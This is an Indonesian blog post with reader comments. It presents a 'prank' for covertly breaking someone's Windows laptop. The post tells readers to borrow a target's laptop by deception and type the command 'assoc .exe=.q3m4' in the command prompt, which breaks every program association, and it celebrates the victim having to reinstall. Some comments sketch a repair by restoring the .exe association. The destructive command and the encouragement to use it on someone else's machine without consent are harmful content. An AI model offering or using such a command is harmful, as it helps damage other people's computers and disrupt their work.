Cara merusak Lepy dalam waktu 17 detik Cara merusak Lepy dalam waktu 17 detik ~ Kempor.Com Cara merusak Lepy dalam waktu 17 detik

Selasa, 04 Mei 2010

cara menjahili laptop
Anda lagi stress? marah? kurang kerjaan? atau lagi cemburu sama seseorang? Penulis punya tips nie, agar emosimu terlampiaskan. Pilih target anda baik cewe' ataupun cowo' selidiki apakah dia punya lepy atau kompi. Setelah dapat target, ajaklah dia bicara, belikan dia makanan, es coffemix tanpa gula. Trus pinjam deh lepy kesayangannya, dengan alasan mau lihat- lihat lagu atau lihat foto. Pasang muka terbego anda dan lihat beberapa gambar, lagu atau film. Setelah dia ndak terlalu memperhatikan anda, lakukan langkah di bawah ini:

- dalam kotak run ketik "cmd" tanpa tanda tanda petik lalu enter (3 detik)

- dalam command prompt ketik "assoc .exe=.q3m4" enter (5 detik)

- close command prompt (2 detik)

- balikin lepy musuhmu , jangan lupa pasang muka bego n ndak punya dosa (7 detik)

Setelah sampai 13,5 meter menjauh dari korban anda bisa tertawa atau teserah mau ngapain!!

sedikit penjelasan:

assoc .exe=.q3m4

Merupakan perintah bahwa semua file yang berekstensi ".exe" di ganti menjadi ".q3m4" Yang akan mengakibatkan semua program tidak bisa dijalankan, dengan kata lain explore.exe. Semua yang berekstensi ".exe" tidak bisa dijalankan bahkan cmd.exe juga tidak bisa di eksekusi.
 

hasilnya apa?
Lepynya harus di install ulang dech? hee....
Asyik...
Emosi terlampiaskan ha ha ha ha..


Artikel ini penulis dapatkan dari x-code magazine 14.
Tapi belum penulis praktekin, soalnya males nginstall ulang, nginstall semua program dari awal..

Kalau cara mengembalikan jadi normal lagi penulis posting kapan- kapan aja.
Mau bubug dulu. heeeeeee...

Thankz:

Ten to Five Just for U, I will Fly.
"Gie" my inspiration song.



Related Posts Plugin for WordPress, Blogger...

10 comments:

  1. mbuh......
    ra mudengan!!!

    BalasHapus
  2. wahahahahaha...amarah terlampiaskan...
    tapi habis itu nangis harus nginstal ulang..hhe

    BalasHapus
  3. ndak usah di instal juga bisa bro...

    tapi lo bingung ya cman tinggal masukin cd,
    install tu windows...

    BalasHapus
  4. hahhaha .. bolle dicoba tu kapand* mass .. :)

    BalasHapus
  5. boleh nuw..

    lepymu aja ruth..
    hahaha...

    gmn?

    BalasHapus
  6. hemmm menurut saya kyknya ga di install ulang jg bisa asalkan .bat bisa jalan .. klik kanan >> New Text Document >> ubah extensinya jadi .bat trus balikin lagi .exe=exefile kyk semula hehehe itu mnurut saya lho kyknya bisa .. pake .reg juga bisa kayaknya .. tapi kalo org yg ga ngerti kasian om :(( apalagi pas lappie nya direstart .. ancur dah tuh start up nya hehehe

    BalasHapus
  7. hehehe...
    betul pak fadil.
    tinggal buka note pad.

    buat perintah.
    simpan bat.

    tapi ntar waktu di jalanin dobel2..
    tapi masih bisa di slametin.

    bagi yang ndak tau ya bawa ke tukang service

    BalasHapus

Mohon tulis nama asli/panggilan/lapangan/panggung/pena etc.
No keyword, No spam, ataupun hal-hal yang jelas.

Terima kasih sudah comment.